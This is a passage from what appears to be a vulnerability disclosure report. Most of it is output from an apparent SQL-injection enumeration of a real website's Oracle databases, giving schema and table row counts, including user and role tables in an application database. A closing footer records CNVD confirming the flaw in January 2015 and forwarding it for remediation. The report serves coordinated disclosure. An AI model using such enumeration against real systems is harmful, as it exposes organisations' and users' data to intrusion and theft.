42 || SDO_ANGLE_UNITS | 12 |+-----------------------------+---------+Database: ODM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ODM_ERROR_TABLE | 342 || ODM_CONFIGURATION | 25 || ODM_INTERNAL_CONFIGURATION | 19 || ODM_PMML_DTD | 1 |+-----------------------------+---------+Database: QS_CBADM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3 |+-----------------------------+---------+Database: CTXSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| DR$STOPWORD | 152 || DR$OBJECT_ATTRIBUTE | 135 || DR$OBJECT_ATTRIBUTE_LOV | 106 || DR$SECTION | 103 || DR$INDEX_VALUE | 80 || DR$OBJECT | 44 || DR$PREFERENCE | 31 || DR$PARAMETER | 27 || DR$PREFERENCE_VALUE | 15 || DR$CLASS | 11 || DR$INDEX_OBJECT | 9 || DR$SECTION_GROUP | 6 || DR$STOPLIST | 3 || DR$SUB_LEXER | 3 || DR$INDEX | 1 || DR$INDEX_SET | 1 |+-----------------------------+---------+Database: VCMS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| WEB_ADVISE | 93022 || WEB_ADVISE | 93022 || WEB_NEWS | 4373 || KCMX | 3986 || KCMX_BAK | 3923 || WEB_USERCOLUMN | 1599 || WEB_COLUMN | 936 || ZXJGANDZHUANYE | 710 || WEB_DIRECTORMAIL | 675 || ROLEUSERS | 327 || ZKZY_NEW_BAK | 229 || ZKZY_NEW | 216 || USERS | 146 || ROLEFUNS | 103 || MYZXJG | 68 || FUNS_BAK | 62 || FUNS | 61 || CODES | 47 || DEPARTMENT | 39 || ZKYX | 32 || WEB_STATCOLUMN | 29 || ROLES | 20 || SEQUENCE | 9 || DAGANG | 2 || MESSAGE | 2 || ZSPX | 2 |+-----------------------------+---------+Database: QS_ES+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_ES_ORDERS_MQTAB_S | 1 || AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: PM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ONLINE_MEDIA | 9 || PRINT_MEDIA | 4 |+-----------------------------+---------+Database: RMAN+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CONFIG | 1 || RCVER | 1 |+-----------------------------+---------+Database: QS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_AQ$_MEM_MC_S | 1 || AQ$_QS_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: QS_WS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_WS_ORDERS_MQTAB_S | 5 || AQ$_QS_WS_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: OE+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| PRODUCT_DESCRIPTIONS | 8640 || INVENTORIES | 1112 || ORDER_ITEMS | 665 || CUSTOMERS | 319 || PRODUCT_INFORMATION | 288 || ORDERS | 105 || WAREHOUSES | 9 |+-----------------------------+---------+Database: SYSTEM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| HELP | 918 || LOGSTDBY$SKIP_SUPPORT | 74 || AQ$_QUEUES | 40 || MVIEW$_ADV_PARAMETERS | 40 || REPCAT$_OBJECT_TYPES | 28 || REPCAT$_RESOLUTION_METHOD | 19 || AQ$_QUEUE_TABLES | 17 || REPCAT$_TEMPLATE_STATUS | 3 || REPCAT$_AUDIT_ATTRIBUTE | 2 || REPCAT$_TEMPLATE_TYPES | 2 |+-----------------------------+---------+Database: SYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| SOURCE$ | 152328 || DEPENDENCY$ | 50048 || ARGUMENT$ | 47847 || ACCESS$ | 43374 || COL$ | 35282 || IDL_UB1$ | 32608 || OBJ$ | 30192 || IDL_SB4$ | 19037 || IDL_UB2$ | 16908 || OBJAUTH$ | 13925 || IDL_CHAR$ | 12455 || SYN$ | 11560 || PROCEDUREINFO$ | 10421 || COM$ | 7150 || JAVASNM$ | 6607 || SETTINGS$ | 4248 || ATTRIBUTE$ | 3336 || CCOL$ | 3317 || CON$ | 3020 || CDEF$ | 3019 || SEG$ | 2666 || VIEW$ | 2541 || PARAMETER$ | 2531 || ICOL$ | 1951 || SMON_SCN_TIME | 1440 || IND$ | 1388 || PROCEDURE$ | 1281 || ATTRCOL$ | 1124 || COLTYPE$ | 1103 || OID$ | 1070 || SYSAUTH$ | 1052 || METHOD$ | 1036 || TAB$ | 907 || TYPE$ | 851 || TYPE_MISC$ | 843 || HISTGRM$ | 795 || VTABLE$ | 759 || RESULT$ | 696 || HIST_HEAD$ | 619 || HS$_BASE_CAPS | 490 || PROCEDUREJAVA$ | 434 || COL_USAGE$ | 384 || LOB$ | 368 || PROCEDUREC$ | 234 || METAFILTER$ | 220 || COLLECTION$ | 207 || STMT_AUDIT_OPTION_MAP | 167 || TRIGGERCOL$ | 160 || SYSTEM_PRIVILEGE_MAP | 157 || AUDIT_ACTIONS | 144 || TYPED_VIEW$ | 136 || INDPART$ | 128 || SEQ$ | 126 || NTAB$ | 121 || HS$_BASE_DD | 102 || OPARG$ | 101 || LIBRARY$ | 90 || TRIGGER$ | 88 || METAXSLPARAM$ | 84 || JAVA$POLICY$ | 78 || EXPDEPACT$ | 73 || DIMATTR$ | 71 || METAVIEW$ | 70 || NOEXP$ | 66 || USER$ | 64 || REFCON$ | 61 || PARTCOL$ | 60 || PARTOBJ$ | 60 || METASTYLESHEET | 58 || BOOTSTRAP$ | 57 || EXPDEPOBJ$ | 57 || METAXSL$ | 57 || PS$ | 55 || TABPART$ | 55 || TYPEHIERARCHY$ | 48 || OPBINDING$ | 40 || LOGMNR_INTERESTING_COLS | 34 || INDOP$ | 33 || HIERLEVEL$ | 31 || OPQTYPE$ | 29 || OPERATOR$ | 28 || DIMLEVEL$ | 27 || DIMLEVELKEY$ | 27 || SUBCOLTYPE$ | 27 || TSQ$ | 27 || UTL_RECOMP_COMPILED | 26 || PROPS$ | 25 || TABLE_PRIVILEGE_MAP | 23 || EXPPKGACT$ | 21 || UNDO$ | 21 || JACCELERATOR$DLLS | 19 || RLS$ | 18 || AQ$_QUEUE_TABLE_AFFINITIES | 17 || EXPACT$ | 17 || PROFILE$ | 17 || RESOURCE_MAP | 16 || REGISTRY$ | 15 || RULE_SET$ | 15 || OPANCILLARY$ | 14 || TS$ | 14 || FILE$ | 11 || OLAP$ALTER_SESSION | 11 || RULE_EC$ | 11 || CLU$ | 10 || REC_TAB$ | 10 || RESOURCE_COST$ | 10 || EXPPKGOBJ$ | 9 || ICOLDEP$ | 9 || INDTYPES$ | 9 || USER_ASTATUS_MAP | 9 || DUC$ | 8 || ASSOCIATION$ | 7 || HIER$ | 7 || RESOURCE_PLAN_DIRECTIVE$ | 6 || DIM$ | 5 || SNAP_LOGDEP$ | 5 || SNAP_REFTIME$ | 5 || SUMDEP$ | 5 || SUMDETAIL$ | 5 || SUMKEY$ | 5 || RESOURCE_CONSUMER_GROUP$ | 4 || SQL_VERSION$ | 4 || SUMPRED$ | 4 || DIR$ | 3 || RESOURCE_PLAN$ | 3 || SNAP_LOADERTIME$ | 3 || SUMJOIN$ | 3 || AW$ | 2 || CONTEXT$ | 2 || JAVA$POLICY$SHARED$TABLE | 2 || REC_VAR$ | 2 || REG_SNAP$ | 2 || SNAP$ | 2 || SUM$ | 2 || SUMAGG$ | 2 || TRIGGERJAVAC$ | 2 || TRIGGERJAVAF$ | 2 || TRIGGERJAVAM$ | 2 || TRIGGERJAVAS$ | 2 || "DUAL" | 1 || AURORA$SHUTDOWN$CLASSES$ | 1 || AURORA$STARTUP$CLASSES$ | 1 || AW$CWMTOECM | 1 || AW$EXPRESS | 1 || CDC_CHANGE_SETS$ | 1 || CDC_CHANGE_SOURCES$ | 1 || CDC_SYSTEM$ | 1 || DIMJOINKEY$ | 1 || EXTERNAL_LOCATION$ | 1 || EXTERNAL_TAB$ | 1 || HS$_FDS_CLASS | 1 || HS$_FDS_CLASS_DATE | 1 || ID_GENS$ | 1 || INCVID | 1 || JAVA$JVM$STATUS | 1 || KOPM$ | 1 || MIGRATE$ | 1 || PROFNAME$ | 1 || SNAP_REFOP$ | 1 || SUPEROBJ$ | 1 || TRUSTED_LIST$ | 1 || VIEWTRCOL$ | 1 |+-----------------------------+---------+Database: SH+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| SALES | 1016271 || COSTS | 787766 || FWEEK_PSCAT_SALES_MV | 149325 || CUSTOMERS | 50000 || PRODUCTS | 10000 || TIMES | 1461 || PROMOTIONS | 501 || CAL_MONTH_SALES_MV | 35 || COUNTRIES | 19 || CHANNELS | 5 |+-----------------------------+---------+Database: SCOTT+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| EMP | 14 || SALGRADE | 5 || DEPT | 4 |+-----------------------------+---------+Database: WMSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| WM$WORKSPACE_PRIV_TABLE | 8 || WM$ENV_VARS | 1 || WM$VERSION_HIERARCHY_TABLE | 1 || WM$WORKSPACES_TABLE | 1 |+-----------------------------+---------+Database: ODM_MTR+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| MAGAZINE_2D_BUILD_BINNED | 6012 || EIGHT_CLOUDS_APPLY_UNBINNED | 4000 || EIGHT_CLOUDS_BUILD_UNBINNED | 4000 || MARKET_BASKET_TX_BINNED | 3800 || CENSUS_2D_BUILD_BINNED | 2940 || CENSUS_2D_BUILD_UNBINNED | 2940 || MAGAZINE_2D_TEST_BINNED | 2613 || CENSUS_2D_APPLY_BINNED | 1226 || CENSUS_2D_APPLY_UNBINNED | 1226 || MARKET_BASKET_2D_BINNED | 1000 || CENSUS_2D_TEST_BINNED | 834 || CENSUS_2D_TEST_UNBINNED | 834 |+-----------------------------+---------+
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-01-12 11:03
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给天津分中心,由天津分中心后续协调网站管理单位处置。
暂无
